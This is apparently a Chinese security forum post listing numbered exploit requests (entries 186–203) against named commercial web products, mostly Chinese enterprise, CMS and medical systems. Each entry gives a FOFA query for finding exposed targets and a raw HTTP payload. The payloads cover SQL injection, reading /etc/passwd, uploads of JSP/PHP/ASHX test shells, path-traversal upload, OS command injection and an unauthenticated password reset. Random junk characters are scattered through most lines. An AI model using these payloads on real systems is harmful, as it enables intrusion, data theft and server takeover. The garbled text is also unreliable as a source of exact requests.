GET /index.php?s=/Admin/appsave&appid=3%27%29%3Bselect+unhex%28%273c3f706870206563686f206d643528223122293b202466696c65203d205f5f46494c455f5f3b20756e6c696e6b282466696c65293b%27%29+into+outfile+%27.%5C%5C..%5C%5C..%5C%5CWebRoot%5C%5Cplom.xgi%27%23 HTTP/1.1
9 b, H6 j. \- q9 D! o* HHost: host
% i4 g; `1 i. n( Y7 F" g
D- g! D& o, T6 ?8 F
1 D, H& C# p8 }! v1 c9 f! I186. F-logic DataCube3 SQL注入
+ u( n# }6 |; S; Z( V, {CVE-2024-31750
; t0 ]- n! N! ^7 `4 aF-logic DataCube3是一款用于光伏发电系统的紧凑型终端测量系统
9 c0 \7 @8 M) j3 n& _0 H- S3 HFOFA:title=="DataCube3"- C0 T( u6 G5 i" {2 z; r) t
POST /admin/pr_monitor/getting_index_data.php HTTP/1.1" C, }) c3 l+ |
Host: your-ip5 Q! \' C% R/ {. ~1 h K
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0. A% x% ^# c/ p1 O1 u' q
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.80 D5 Y6 w1 K! c4 n% O- ~7 K+ L
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
, n% q& y4 y: v5 D c2 HAccept-Encoding: gzip, deflate
) W, l- e, F, MConnection: close5 {+ [0 m& w( m' ^* M) j+ |
Content-Type: application/x-www-form-urlencoded
( h( c) e. ~% l& t6 U* L6 o. _& \% x, r! H( {0 \; {% G+ ]
req_id=1) AND 1113=LIKE(CHAR(65,66,67,68,69,70,71),UPPER(HEX(RANDOMBLOB(500000000/2)))) AND (1450=1450
/ C8 p! b7 C: r- p. Y' @9 {5 a: |& l% P X4 z8 N& T
2 B- H; W G% n c
187. Mura CMS processAsyncObject SQL注入* V' k- F2 U I) H& [1 V1 p ?
CVE-2024-32640* c: {; Y2 m) [; X2 O
FOFA:"Mura CMS"
* w5 g# K* E4 H5 rPOST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.1. _. x I3 n! w5 s q
Host: your-ip
/ s2 x0 a1 r, d% i! z' M1 h% dContent-Type: application/x-www-form-urlencoded/ s# N4 R$ ^& z! I' W( T9 T
& ]8 K& ]# r' _, @0 r% n) L8 Q
* E& v5 z2 U# a9 F( U9 zobject=displayregion&contenthistid=x%5c' AND (SELECT 3504 FROM (SELECT(SLEEP(5)))MQYa)-- Arrv&previewid=1
6 |0 f5 b6 j# p# o
' Q2 \( T+ b0 i! J1 a( M3 D4 U# \ } k9 V+ f" D# m
188. 叁体-佳会视频会议 attachment 任意文件读取* ?4 I$ `0 Z1 @! x" f
version <= 3.9.7, I% A: g" d" d
FOFA:body="/system/get_rtc_user_defined_info?site_id"$ A4 E9 Z9 Z3 L4 P& o3 A4 Z
GET /attachment?file=/etc/passwd HTTP/1.1# _6 r: X1 Q3 B: _' U, A
Host: your-ip
8 j1 k- n3 H* K: PUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.364 [: Z0 p6 Q" D+ \: @
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
5 M8 b) ~5 t5 J% v c$ G+ DAccept-Encoding: gzip, deflate
* @. N0 }1 k' J* a- L: K+ r# qAccept-Language: zh-CN,zh;q=0.9,en;q=0.8# Z( P1 _0 R: `0 m$ c5 W3 K. n
Connection: close
: F! j% x* u9 }; @. V4 |+ m% g# F1 g M8 g% {% C0 X" ~
' u7 W0 D+ }/ f5 n: r8 ^4 S189. 蓝网科技临床浏览系统 deleteStudy SQL注入" A) b- X4 t" n5 M$ Q
FOFA:app="LANWON-临床浏览系统"
! o/ H! C) N0 x# o- J" k& UGET /xds/deleteStudy.php?documentUniqueId=1%27;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1
+ M1 a% A+ R5 ?Host: your-ip( \. ?. d9 W" E I& d0 g% y3 M
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
! t& w1 n2 h& ^* c9 u8 ~# |Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
* M" v, W$ [/ ^" cAccept-Encoding: gzip, deflate, j; e* v/ U$ e7 _' Z
Accept-Language: zh-CN,zh;q=0.9. S2 u3 F, v; j$ O- H8 A" F5 E! w
Connection: close
3 } \% b+ W) z9 \/ ]$ R
+ l; y) T9 B* F2 c' I3 k- j( w4 O- W- }% ] Q3 ~
190. 短视频矩阵营销系统 poihuoqu 任意文件读取; z% p! @$ @7 n5 Z- ^
FOFA:title=="短视频矩阵营销系统"
! D; m' b5 V& APOST /index.php/admin/Userinfo/poihuoqu HTTP/2# Y% A3 B, j; s% [9 a) j( e) v
Host: your-ip9 g/ D1 |8 w$ n3 X; b2 T
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36/ B I) h3 T5 w! S% t
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9. m9 P( i! D8 i" }4 l2 D
Content-Type: application/x-www-form-urlencoded
5 t8 s; c8 b4 N! ~6 cAccept-Encoding: gzip, deflate
$ [% a& R$ P5 E" JAccept-Language: zh-CN,zh;q=0.9
9 l% d0 o( r$ `: `! A& x
! y3 ]! }9 F2 B8 _6 h4 \, Wpoi=file:///etc/passwd( d8 ~* K& U4 i/ ^ F5 D
0 M( u" [. b+ p' J9 L3 Z+ b2 a! T1 x
+ g- i* ^5 s U2 H/ [' L, K# A3 t191. 亿赛通电子文档安全管理系统 NavigationAjax SQL注入2 u0 M/ k8 A; k' J
FOFA:body="/CDGServer3/index.jsp"
& F8 L8 w) z' R7 V0 [POST /CDGServer3/js/../NavigationAjax HTTP/1.1" ~8 N- ~8 H6 W+ A; k, Q" V8 t( _7 ~
Host: your-ip/ C) ~) q+ J$ p% @& v
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36# t* P* p# u6 x# l/ {
Content-Type: application/x-www-form-urlencoded
9 K2 o) {1 @3 u, [6 E- J% I) ^" a/ l& b# u; Z& r% E
command=nav&id=1'waitfor delay '0:0:5'--+&name=&openId=4 m- J* c1 s* g
# ~. ?: P6 K; K" I8 E
, u/ ]" S! y( W6 Y4 b192. 富通天下外贸ERP UploadEmailAttr 任意文件上传
+ U7 e( o# X( p( R2 K; }3 FFOFA:title="用户登录_富通天下外贸ERP"
/ E6 r+ L9 N8 E8 w; ?% p- lPOST /JoinfApp/EMail/UploadEmailAttr?name=.ashx HTTP/1.1# r1 m$ _0 X1 x4 }
Host: your-ip" T+ Z H w4 C2 D- t* A9 R0 \" `, B
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
" {, a8 s( }6 {4 aContent-Type: application/x-www-form-urlencoded2 l% C" y* Z9 Y2 V
& i& _7 o* q0 s# D8 f# Y& Z# m
: H+ a' a, I/ k. s& t0 q4 S<% @ webhandler language="C#" class="AverageHandler" %>/ R% L! n/ O. I/ i$ m, F
using System;
$ S5 _4 x" R; w/ W1 Tusing System.Web;
5 e4 v2 y: X: K* g6 u& Apublic class AverageHandler : IHttpHandler
. W2 W! K$ Q* R; _{
. n, K9 s3 p9 U3 W" ?public bool IsReusable
: c Z4 _0 p1 \2 T/ w& H{ get { return true; } }
! q+ Q, n5 t, Opublic void ProcessRequest(HttpContext ctx) [( u* ~$ | `! k9 V% b! T
{# v8 u. r$ V2 Q2 V3 ?
ctx.Response.Write("test");
& s1 ^; _3 Y3 X3 X* S2 `& k}
8 ^7 l6 t* {' N% H7 J( @}
: N- f* H" L" b/ N7 n* w) L9 W) l ~- c8 ^7 Q
! ]+ ?, Y* M- M o+ D
193. 山石网科云鉴安全管理系统 setsystemtimeaction 命令执行
& @' y4 H5 ]: Q8 Z4 T/ y% o/ ?6 kFOFA:body="山石云鉴主机安全管理系统"
/ p$ X9 C, c5 j' jGET /master/ajaxActions/getTokenAction.php HTTP/1.1
' d7 s- H6 M; `$ t' YHost:
- N8 l" b4 o* T0 ]Cookie: PHPSESSID=2333333333333; ]9 }+ G! E- E9 h/ P* ^
Content-Type: application/x-www-form-urlencoded
/ @# H; K" v/ a. l7 Z$ OUser-Agent: Mozilla/5.0& t1 c: ~- a" }% H4 `5 J
+ O# Y- k( r. J; A
! |3 Q" d% a: s d. `* IPOST /master/ajaxActions/setSystemTimeAction.php?token_csrf={{token}} HTTP/1.1/ D6 M0 x/ u& j/ W( i% f$ \% U
Host:
/ R0 C8 t& G$ k7 \User-Agent: Mozilla/5.0
" z8 t- U0 P) w; y) a8 FAccept-Encoding: gzip, deflate( k7 a& K2 |5 W+ F* l" p6 M/ r: K
Accept: */*# @8 p+ l( K4 ~8 y# O5 \3 p
Connection: close
?. x7 U# @" o/ F6 PCookie: PHPSESSID=2333333333333;
2 _% a5 M& |4 n" c. w% T' M0 sContent-Type: application/x-www-form-urlencoded
& M- @$ {7 c# ~# xContent-Length: 84/ ~) t% Q- i7 v/ |
" m* w( X/ N5 ?, T% B% T
param=os.system('echo 23333333333456 > /opt/var/majorsec/installation/master/runtime/img/config')
; U/ C, P: `7 l& D/ V; T8 z H6 e+ R, c3 M7 C: W5 S6 I
8 Q* o3 j! c. l% S' U! W$ @6 ~GET /master/img/config HTTP/1.1+ C. x V, v7 E/ ]
Host:; M! {7 K: D2 m9 _
User-Agent: Mozilla/5.06 e- N) u$ s) A: V7 H9 e( q7 u
# H; k% A* c( K1 P" l k; `. p0 }0 I6 Q. T( \5 v7 @
194. 飞企互联-FE企业运营管理平台 uploadAttachmentServlet 任意文件上传
: F) y# A3 J) q- {, t- T/ n* q7 y) @FOFA:app="FE-协作平台"访问 /servlet/uploadAttachmentServlet 有返回则漏洞存在
* L; Q, `7 L9 y, I
- z' O S6 q8 V i: yPOST /servlet/uploadAttachmentServlet HTTP/1.1
. C( {& Y; u9 v8 }Host: host" `7 X; Y' m0 W1 k$ W1 ?
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.364 o, e7 c; E7 T
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
1 R! G: Y4 m% B( w- O+ u/ }Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
# e* C) Z. ~3 T: V' Q* D0 T! mAccept-Encoding: gzip, deflate. A" K' U7 ~7 Q$ z5 ~: _
Connection: close1 L$ ^% d. n! w7 P3 a
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryKNt0t4vBe8cX9rZk$ p6 f5 S6 Y+ }# J; p
------WebKitFormBoundaryKNt0t4vBe8cX9rZk) L3 e Y& ^) w6 w4 j
# o1 b+ v' l& K2 F, ^* Y5 xContent-Disposition: form-data; name="uploadFile"; filename="../../../../../jboss/web/fe.war/hello.jsp"
0 h2 ?3 Z/ |) V# [3 pContent-Type: text/plain% a; G9 E$ M f: s& j
<% out.println("hello");%>
2 b$ s9 i( K. }$ o1 D) l1 V------WebKitFormBoundaryKNt0t4vBe8cX9rZk
' p3 N( {+ B) w. n4 }Content-Disposition: form-data; name="json" a3 U6 K+ h4 q( {/ Z7 Q
{"iq":{"query":{"UpdateType":"mail"}}}
) i- I; S& i, W! t2 d( ^6 o------WebKitFormBoundaryKNt0t4vBe8cX9rZk--0 v. z9 }& _5 x1 R. {. U
% t. @1 L# ]3 I0 X( C: M: [- Q
7 ~2 B. J) e3 {8 b9 c% d* }! `( r195. 飞鱼星上网行为管理系统 send_order.cgi命令执行+ s6 h9 H- B2 Q5 j5 e% k2 D* {
FOFA:title=="飞鱼星企业级智能上网行为管理系统+ b6 Y4 B/ ~% E: d" ? k
POST /send_order.cgi?parameter=operation HTTP/1.1% X# ~; `/ ~6 s8 I; Z4 l4 J
Host: 127.0.0.1! g/ r2 V; P+ d) x! n0 f
Pragma: no-cache
! c' n% ]- d% W$ h7 D, LCache-Control: no-cache
8 }: E& O9 _6 Q& G1 @4 GUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
" N, ?$ O+ X0 ~Accept: */*
. S: g3 r3 J/ l* b ^% ^' ^; fAccept-Encoding: gzip, deflate+ O& b7 y% h1 O% [# ?% m3 b
Accept-Language: zh-CN,zh;q=0.9( `8 x; C0 V) Z( u4 {' E
Connection: close: C, A5 N0 @; p% }! i7 d
Content-Type: application/x-www-form-urlencoded- R0 @2 G B+ e3 ]: m4 B
Content-Length: 687 C' f. o3 i# M$ T. x! a2 i, G1 K
1 ^/ r+ d! \. v, y8 r- h$ ]% H{"opid":"777777777777777777","name":";uname -a;echo ","type":"rest"}' F9 r" T! [* m }0 p J
: i, p. Z0 p4 D r# _+ U5 z3 `2 K
196. 河南省风速科技统一认证平台密码重置
& B- ]# b1 X2 kFOFA:body="/cas/themes/zbvc/js/jquery.min.js"" q# t2 W* X: `1 l7 a4 d7 w l2 E
POST /cas/userCtl/resetPasswordBySuper HTTP/1.1. @, C& F) p" {1 p" X
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36" D3 b; Z9 P' M/ J' R
Content-Type: application/json;charset=UTF-8; J n# H, b* F7 {# n, K+ r$ v. l
X-Requested-With: XMLHttpRequest
, T& N2 S8 X' T2 A# h( MHost:% u! d1 M. T" r y, p
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.29 u5 S0 v6 Z* b7 i" v# \, i" j0 Z
Content-Length: 456 v* a- \0 J1 S) ~
Connection: close
V7 D$ g# v1 `- e$ n' Z, u' \' \# P1 `
{"xgh":"test","newPass":"test666","email":""}- b! R1 P' w! }- U* [; u8 K2 O- @2 F7 U
' J. M& l4 { \) @4 x
' f$ L. s |; i- O3 b; S0 @
# m' a' P' n- A. W" r) o197. 浙大恩特客户资源管理系统-Quotegask_editAction存在SQL注入
# O6 r+ ]: c" n9 R3 [. Y( ^6 WFOFA:app="浙大恩特客户资源管理系统"3 e3 U4 D5 z5 \' d- `3 e+ p/ T
GET /entsoft/Quotegask_editAction.entweb;.js?goonumStr=1')+UNION+ALL+SELECT+111*111--+&method=goonumIsExist HTTP/1.1: K# j1 x! m& h. W
Host:
) g6 x& p1 l7 ?4 `, a* iUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.365 j) g9 M$ O. ~ B/ H o0 ~
Accept-Encoding: gzip, deflate9 @! g. w( {( a" ]9 R
Connection: close `1 l$ ]7 Y U! p# J7 C* i8 s
* }+ S4 p* {! e9 D
3 l& Z$ i0 y0 h4 _, c) ?: }. p6 t& m9 C6 L2 U4 k3 k) `+ i
198. 阿里云盘 WebDAV 命令注入
2 l' i: a- E4 b$ b/ @3 T; xCVE-2024-29640# x2 E8 @# h, ~$ z1 g
GET /cgi-bin/luci/admin/services/aliyundrive-webdav/query?sid=%60%6c%73%20%2f%3e%2f%77%77%77%2f%61%61%61%2e%74%78%74%60%20 HTTP/1.1
( |$ H. U* `! F9 }& J [: |Cookie: sysauth=41273cb2cffef0bb5d0653592624cf64
# z4 N- q9 e% B; k0 j6 o9 F* iAccept: */*# F; E1 W- j" `
Accept-Encoding: gzip, deflate2 D! z4 X# V& E4 Y- K0 E' N
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
+ B) l$ q. A+ F D- \' |0 R4 j: wConnection: close# x" T! U% }1 r6 P; ]
( L+ T- R1 u7 n) A7 O- @6 L. U5 p2 T2 q7 h C& u
199. cockpit系统assetsmanager_upload接口 文件上传% `' [! ?" p3 f- [( A
% v0 K7 `+ J. H) o3 c& b1.执行poc进行csrf信息获取,并获取cookie,再上传访问得到结果:2 l4 |: c( z2 l$ {
GET /auth/login?to=/ HTTP/1.19 Y4 y h; T* I
0 |+ a5 Q+ d9 @6 u8 W" Q
响应:200,返回值:csfr:"eyJ0eXAi0iJKV1QiLCJhbGci0iJIUsI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"4 q) T: e) j/ g) v
" [/ x# F& j4 N7 B* T2.使用刚才上一步获取到的jwt获取cookie:
2 k# ~$ }- Q& q. d5 i6 K) s: W: [4 Y9 G/ G6 P4 \& T
POST /auth/check HTTP/1.11 J5 t' n* t7 f1 A* u4 u, ]. C2 U
Content-Type: application/json) Y2 ]: C: r' {; i/ k' j# ?
' e1 w P4 W7 |9 l l{"auth":{"user":"admin","password":"admin"},"csfr":"eyJ0eXAi0iJKV1QiLCJhbGci0iJIUsI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"}
5 t! P1 o# S# ?1 d4 C& W7 I- p" \" T4 H$ {: ]1 E$ j, Z
响应:200,返回值:
. `. E8 l( ?7 k- J1 ]Set-Cookie:mysession=95524f01e238bf51bb60d77ede3bea92: path=/# _& K0 r* A$ P7 Z+ N& I
Fofa:title="Authenticate Please!"
0 A* m% A n/ p! ePOST /assetsmanager/upload HTTP/1.1
3 k9 T5 {8 @0 o2 I4 c! TContent-Type: multipart/form-data; boundary=---------------------------36D28FBc36bd6feE7Fb3: Y8 ~1 b7 R" u) } J) _
Cookie: mysession=95524f01e238bf51bb60d77ede3bea92% H8 z6 }0 ?. C0 \: T( Z
: k+ i: i! m6 ^ V" J4 G8 t7 N-----------------------------36D28FBc36bd6feE7Fb3; p, v! P/ d' M* i& @' R* E6 m
Content-Disposition: form-data; name="files[]"; filename="tttt.php"
4 v' P- ?9 k2 W( fContent-Type: text/php e0 p& F6 ^" C, Q, v
3 O' b* n b( d, u9 h0 ~) K+ ?3 s" V+ c<?php echo "tttt";unlink(__FILE__);?>7 U3 o+ @; i& ~$ l
-----------------------------36D28FBc36bd6feE7Fb3
7 v k! c z* g% d4 S1 n' }Content-Disposition: form-data; name="folder"
% n2 `4 q- C5 C0 |/ H" K1 I
6 u \! y7 T, l" z/ k& \$ i-----------------------------36D28FBc36bd6feE7Fb3--. T- S6 @! e# _8 _
( e% c W2 o0 O+ V' h0 \' i' x5 D# k6 Q1 `
/storage/uploads/tttt.php
7 `5 V! \: b! J9 Z2 [4 Q
1 w' B9 o" s g9 @- n" j& W4 [9 S200. SeaCMS海洋影视管理系统dmku SQL注入) A6 Q2 y! W8 l# K% J
FOFA:app="海洋CMS"
9 V. B" Y+ Z$ U( A+ h5 Q; CGET /js/player/dmplayer/dmku/?ac=del&id=(select(0)from(select(sleep(5)))v)&type=list HTTP/1.1
4 k$ F. S9 f5 @9 j- R: l0 M D# FCookie: PHPSESSID=hlfl5flck9q3ng1blehhv86s4s
: {1 V2 S1 x$ X- o ]Upgrade-Insecure-Requests: 1
0 d' w& ]5 a: o- g7 pCache-Control: max-age=0; z7 h$ h) T* @$ D/ d( f
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
' ]2 v- k' m0 V- ]& |/ eAccept-Encoding: gzip, deflate$ H$ V8 V" I/ U4 y
Accept-Language: zh-CN,zh;q=0.90 {1 I" a+ y5 ~- a- n
0 M8 |# X+ z2 b. e- s4 b
! z; O# Z2 y. I% g& x201. 方正全媒体新闻采编系统 binary SQL注入2 ?* { a7 ~0 Z& }8 W
FOFA:body="/newsedit/newsedit/" || app="FOUNDER-全媒体采编系统"
; E8 n. q( i% P& vPOST /newsedit/newsplan/task/binary.do HTTP/1.1* v5 L9 I; a3 v* d7 @4 Y6 r
Content-Type: application/x-www-form-urlencoded
" d5 x2 t* m' D3 ZAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7$ u6 P0 f5 N" |! E
Accept-Encoding: gzip, deflate3 ^7 ^5 p# ], D7 u- _3 ?& l# ]
Accept-Language: zh-CN,zh;q=0.9$ j; i. u( x) {( {- M1 K4 S
Connection: close
" v8 W; c3 {: i% {
! U/ |; i1 H; g+ K7 JTableName=DOM_IMAGE+where+REFID%3D-1+union+select+%271%27%3B+WAITFOR+DELAY+%270%3A0%3A5%27%3Bselect+DOM_IMAGE+from+IMG_LARGE_PATH&FieldName=IMG_LARGE_PATH&KeyName=REFID&KeyID=1; o5 |" A6 B* H* L
" S E$ |* J+ j( h6 |5 v% x. u7 y
( v" {; s% e+ E( ]/ Z8 }202. 微擎系统 AccountEdit任意文件上传. C9 P5 U7 V* `8 o# s
FOFA:body="/Widgets/WidgetCollection/"9 l) g: u/ R, w/ J
获取__VIEWSTATE和__EVENTVALIDATION值" b5 I9 I, i9 G0 d: D! F
GET /User/AccountEdit.aspx HTTP/1.1
4 N. I1 p8 ~$ F2 s7 r9 K X, ~Host: 滑板人之家
) k( c! \' X( X; X2 ?* w5 z, G& @User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/531.36 (KHTML, like Gecko) Chrome/83.0.4103.112 Safari/537.319 `8 |1 S( q8 A8 s
Content-Length: 0
; o, f% }6 A) |+ Q4 X. ~
2 j* k7 r0 A: d [2 Q' r
: K2 g! X& u7 I7 ^替换__VIEWSTATE和__EVENTVALIDATION值
1 A2 c O3 A9 }" Z! QPOST /User/AccountEdit.aspx HTTP/1.1
( U/ v9 D5 C) _Accept-Encoding: gzip, deflate, br
5 q! ^1 O3 v5 ?Content-Type: multipart/form-data;boundary=---------------------------786435874t385875938657365873465673587356875 b' S w/ G+ u
) }8 B3 e, T0 P% `. ?-----------------------------786435874t38587593865736587346567358735687
+ N& }; t v3 `Content-Disposition: form-data; name="__VIEWSTATE"
6 ?3 C& \ a2 _5 J) i% l8 S; D% C3 l+ ^+ @7 H& R
__VIEWSTATE
) a u! L( T5 H* ^' R-----------------------------786435874t38587593865736587346567358735687/ v+ S" z+ i. R g7 r0 X$ {0 z1 F
Content-Disposition: form-data; name="__EVENTVALIDATION"9 H- U3 V/ F9 c* f& ?
2 G; e+ m/ ^. v& N a; b
__EVENTVALIDATION
" u7 Z. e7 R" M, q* D-----------------------------786435874t38587593865736587346567358735687
- ^* [; |+ M+ K' T9 H5 NContent-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$upload"; filename="1123.txt"+ ^$ p7 e5 u: T
Content-Type: text/plain
) f1 `& p, i$ N# Z: y N: a9 p) [) V+ o! R }8 F# a
Hello World!
4 y# q0 r* j2 K0 s2 T-----------------------------786435874t385875938657365873465673587356877 A Y. K9 I/ X( U" c: c
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$bttnUpload"# ] x/ U1 U) O" `4 _
2 R, e5 l. z7 f: J
上传图片) T& F; H4 g% Q! j- Z
-----------------------------786435874t38587593865736587346567358735687
" h3 Q# T6 w MContent-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtLastName"
( I2 p# a! }7 \6 r
' T2 H) N! T/ s/ H7 p$ g+ ?$ \; v! C: i, G7 d
-----------------------------786435874t385875938657365873465673587356875 b; T/ j8 J# z
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtEmail"( o& t5 L/ T. N9 S* x3 F8 [
7 b$ G8 k" `1 c
% E! c" ]$ m4 [/ v& d
-----------------------------786435874t38587593865736587346567358735687--" A8 \; k1 \, b& w" c8 A+ |* T
3 ]7 N1 f1 v: g: P. m5 N. o
. z: m/ ^6 Z8 |4 q! E" D% e1 z/_data/Uploads/1123.txt) V7 C( p9 d! w0 [6 x |
! f$ v7 Y5 P, @" D' E) x
203. 红海云EHR PtFjk 文件上传
3 [$ I2 h% c. B0 ], ?* q- e5 Q2 fFOFA:body="RedseaPlatform"
3 |' p( L+ w& g$ H0 dPOST /RedseaPlatform/PtFjk.mob?method=upload HTTP/1.1* I# Q. d" @+ o8 d2 @
Host: x.x.x.x% H! [# i- w# U9 R
Accept-Encoding: gzip
" l, j* R6 J- UUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15; i# Z7 `( C! G/ u! v! Z5 H) A
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryt7WbDl1tXogoZys4& g( A8 h+ C8 w4 \& R+ Z/ {: R4 K
Content-Length: 210
2 `7 q6 B: s: u' z6 ]( \* f% f* u* x' V
------WebKitFormBoundaryt7WbDl1tXogoZys4
4 Z. `9 @; g0 N3 p' o9 jContent-Disposition: form-data; name="fj_file"; filename="11.jsp"
* g' e% F! ^% nContent-Type:image/jpeg$ g9 [5 B4 g. B+ s# q8 q
8 C& ?9 O4 x- [+ K8 Y: @<% out.print("hello,eHR");%>
: f9 f- L8 K/ P% ]% q1 a------WebKitFormBoundaryt7WbDl1tXogoZys4--+ [0 q& B1 @% x4 D3 h
* ?! D' S% ?6 T. ]; ]( o" ~2 e' Y6 o
' R6 d9 f) Y! X" q9 o9 e: M& C2 W% t- F5 n
, }. b: X, n; t9 Y# z X6 Q2 R0 X
! a+ G) t6 ?! h0 H# ^: v
$ W/ ^) ?: d! K4 g1 l, J# p6 J |
发表于 2024-6-5 14:31:29
收藏
支持
反对